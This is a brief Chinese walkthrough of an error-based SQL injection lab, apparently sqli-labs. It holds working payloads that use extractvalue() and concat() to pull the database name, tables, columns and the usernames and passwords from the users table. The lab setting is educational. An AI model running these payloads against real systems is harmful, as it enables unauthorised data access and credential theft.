初始界面:
?id=1'
?id=1"
?id=1" and 1=1--+
?id=1" and 1=2--+
初步判断为括号双引号字符型注入。
order by (数字)--+ 没有括号
还是3列
显示位
union select 1,2,3--+
知识点:
extractvalue():从目标XML中返回包含所查询值的字符串。
EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串)
concat:返回结果为连接参数产生的字符串。
数据库名:
and extractvalue(1,concat(1,2,database()))--+
表名:
and extractvalue(1,concat(1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')))--+
列名:
and extractvalue(1,concat(1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))--+
字段:
and extractvalue(1,concat(1,2,(select group_concat(0x23,username,0x23,password) from security.users)))--+